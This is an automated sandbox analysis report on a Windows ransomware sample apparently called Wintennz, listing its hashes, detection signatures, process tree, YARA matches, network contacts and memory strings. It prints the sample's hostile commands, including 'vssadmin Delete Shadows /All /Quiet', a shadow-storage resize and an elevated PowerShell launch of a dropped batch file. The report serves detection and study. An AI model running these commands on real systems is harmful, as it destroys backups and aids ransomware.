Play interactive tour

Edit tour

Analysis Report IJht2pqbVh

Overview

General Information

Sample Name:	IJht2pqbVh (renamed file extension from none to exe)
Analysis ID:	385060
MD5:	2716659c3b1e8927dcb2e418e99b1ea5
SHA1:	0428a2ead08f005f3c90a493e10207322d8a429b
SHA256:	1ba9ef8703b10a0f158636a138b120835e9588c21ec2e78be898afcae54b0142
Tags:	Ransomwarewintenzz
Infos:
Most interesting Screenshot:

Detection

Wintennz

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Wintennz Ransomware

Deletes shadow drive data (may be related to ransomware)

Drops HTML or HTM files to system directories

Drops PE files to the startup folder

May disable shadow drive data (uses vssadmin)

Modifies existing user documents (likely ransomware behavior)

Suspicious powershell command line found

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

IJht2pqbVh.exe (PID: 7096 cmdline: 'C:\Users\user\Desktop\IJht2pqbVh.exe' MD5: 2716659C3B1E8927DCB2E418E99B1EA5)

powershell.exe (PID: 7148 cmdline: 'powershell' get-wmiobject win32_computersystem | fl model MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5992 cmdline: 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6396 cmdline: 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vssadmin.exe (PID: 6588 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)

vssadmin.exe (PID: 6976 cmdline: vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB MD5: 47D51216EF45075B5F7EAA117CC70E40)

cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\rstrt.bat'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

iexplore.exe (PID: 6296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6296 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

winstrt10.exe (PID: 3492 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe' MD5: 2716659C3B1E8927DCB2E418E99B1EA5)

powershell.exe (PID: 2792 cmdline: 'powershell' get-wmiobject win32_computersystem | fl model MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5996 cmdline: 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 492 cmdline: 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vssadmin.exe (PID: 4684 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)

vssadmin.exe (PID: 7112 cmdline: vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB MD5: 47D51216EF45075B5F7EAA117CC70E40)

powershell.exe (PID: 6240 cmdline: 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1584 cmdline: 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
IJht2pqbVh.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
IJht2pqbVh.exe	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
Process Memory Space: IJht2pqbVh.exe PID: 7096	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
22.2.winstrt10.exe.7ff78d1a0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
22.2.winstrt10.exe.7ff78d1a0000.0.unpack	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
0.2.IJht2pqbVh.exe.7ff606e10000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
0.2.IJht2pqbVh.exe.7ff606e10000.0.unpack	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
22.0.winstrt10.exe.7ff78d1a0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
22.0.winstrt10.exe.7ff78d1a0000.0.unpack	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
0.0.IJht2pqbVh.exe.7ff606e10000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xb21b1:$: DECRYPT.txt
0.0.IJht2pqbVh.exe.7ff606e10000.0.unpack	JoeSecurity_Wintennz	Yara detected Wintennz Ransomware	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Metadefender: Detection: 27%			Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Show sources

Source: IJht2pqbVh.exe	Virustotal: Detection: 49%	Perma Link
Source: IJht2pqbVh.exe	Metadefender: Detection: 27%	Perma Link
Source: IJht2pqbVh.exe	ReversingLabs: Detection: 62%

Source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.198.174.208:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.198.174.208:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: IJht2pqbVh.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:

Binary string: C:\Users\wintenzz\wintenzz\target\release\deps\wntnproj.pdb source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E64F30 memset,FindFirstFileW,memmove,GetLastError,

0_2_00007FF606E64F30

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: unknown

DNS traffic detected: queries for: 2no.co

Source: powershell.exe, 00000002.00000002.647554331.000002F13406A000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.655618500.00000252E04B7000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.738087210.0000019FC1C34000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.764899800.000001994F184000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.790451402.000001ADFDF08000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000017.00000002.739969866.0000019FC213B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000017.00000002.739969866.0000019FC213B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr-Fm
Source: powershell.exe, 00000002.00000002.639779450.000002F11BEA0000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.668145923.00000252D81C7000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.726558654.0000019FA9990000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.751433810.0000019936F41000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.639521979.000002F11BC91000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.657155045.00000252C8021000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.725579504.0000019FA9781000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.750960839.0000019936D31000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778038630.000001ADE5B71000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	String found in binary or memory: http://www.myip.ch
Source: IJht2pqbVh.exe, IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	String found in binary or memory: https://2no.co/2DetN5
Source: winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	String found in binary or memory: https://bitcoin.org/en/buy
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.639988526.000002F11C05D000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.728977699.0000019FAA302000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.648382805.000002F134226000.00000004.00000001.sdmp	String found in binary or memory: https://go.micros
Source: powershell.exe, 00000002.00000002.639779450.000002F11BEA0000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.668145923.00000252D81C7000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.726558654.0000019FA9990000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.751433810.0000019936F41000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.198.174.208:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.198.174.208:443 -> 192.168.2.4:49751 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Wintennz Ransomware

Show sources

Source: Yara match	File source: IJht2pqbVh.exe, type: SAMPLE
Source: Yara match	File source: 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IJht2pqbVh.exe PID: 7096, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, type: DROPPED
Source: Yara match	File source: 22.2.winstrt10.exe.7ff78d1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IJht2pqbVh.exe.7ff606e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.winstrt10.exe.7ff78d1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.IJht2pqbVh.exe.7ff606e10000.0.unpack, type: UNPACKEDPE

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet	Jump to behavior
Source: vssadmin.exe, 00000008.00000002.659262931.000001F15A3F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000008.00000002.659262931.000001F15A3F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000008.00000002.659262931.000001F15A3F0000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000008.00000002.659262931.000001F15A3F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000008.00000002.659262931.000001F15A3F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000008.00000002.659278208.000001F15A420000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quietvssadmin.exe Delete Shadows /All /QuietWinsta0\Default
Source: vssadmin.exe, 00000008.00000002.659278208.000001F15A420000.00000004.00000020.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: vssadmin.exe, 00000008.00000002.659505252.000001F15A6A5000.00000004.00000040.sdmp	Binary or memory string: vssadmin.exeDeleteShadows/All/Quiet
Source: vssadmin.exe, 0000000B.00000002.661595761.0000021F321F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 0000000B.00000002.661595761.0000021F321F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 0000000B.00000002.661595761.0000021F321F0000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 0000000B.00000002.661595761.0000021F321F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 0000000B.00000002.661595761.0000021F321F0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: vssadmin.exe, 00000020.00000002.750372111.0000024D49870000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quietvssadmin.exe Delete Shadows /All /QuietWinsta0\Defaultm
Source: vssadmin.exe, 00000020.00000002.750372111.0000024D49870000.00000004.00000020.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: vssadmin.exe, 00000020.00000002.750372111.0000024D49870000.00000004.00000020.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet)
Source: vssadmin.exe, 00000020.00000002.750486932.0000024D49B64000.00000004.00000040.sdmp	Binary or memory string: vssadmin.exeDeleteShadows/All/Quietz
Source: vssadmin.exe, 00000020.00000002.750276610.0000024D49820000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000020.00000002.750276610.0000024D49820000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000020.00000002.750276610.0000024D49820000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000020.00000002.750276610.0000024D49820000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000020.00000002.750276610.0000024D49820000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000021.00000002.752712883.0000028F097C0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000021.00000002.752712883.0000028F097C0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000021.00000002.752712883.0000028F097C0000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000021.00000002.752712883.0000028F097C0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000021.00000002.752712883.0000028F097C0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:

May disable shadow drive data (uses vssadmin)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB

Modifies existing user documents (likely ransomware behavior)

Show sources

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File deleted: C:\Users\user\Desktop\LHEPQPGEWF.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File deleted: C:\Users\user\Desktop\LHEPQPGEWF.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File deleted: C:\Users\user\Desktop\BXAJUJAOEO\BXAJUJAOEO.docx	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File deleted: C:\Users\user\Desktop\BXAJUJAOEO\BXAJUJAOEO.docx	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File deleted: C:\Users\user\Desktop\LHEPQPGEWF\BQJUWOYRTO.pdf	Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E33F50	0_2_00007FF606E33F50
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E9DDD0	0_2_00007FF606E9DDD0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E5CDC0	0_2_00007FF606E5CDC0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E14D3F	0_2_00007FF606E14D3F
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E22CB0	0_2_00007FF606E22CB0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E66C70	0_2_00007FF606E66C70
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E33020	0_2_00007FF606E33020
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E46F80	0_2_00007FF606E46F80
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E6C120	0_2_00007FF606E6C120
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E478E0	0_2_00007FF606E478E0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E5C5C0	0_2_00007FF606E5C5C0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E31D70	0_2_00007FF606E31D70
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E45720	0_2_00007FF606E45720
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E3E6F0	0_2_00007FF606E3E6F0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E5AE40	0_2_00007FF606E5AE40
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E63B40	0_2_00007FF606E63B40
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E62B40	0_2_00007FF606E62B40
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E76520	0_2_00007FF606E76520
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E3E510	0_2_00007FF606E3E510
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E3EA30	0_2_00007FF606E3EA30
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E79A00	0_2_00007FF606E79A00
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E7A9F0	0_2_00007FF606E7A9F0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E6E950	0_2_00007FF606E6E950
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E3E300	0_2_00007FF606E3E300
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E782B0	0_2_00007FF606E782B0
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606E76A50	0_2_00007FF606E76A50
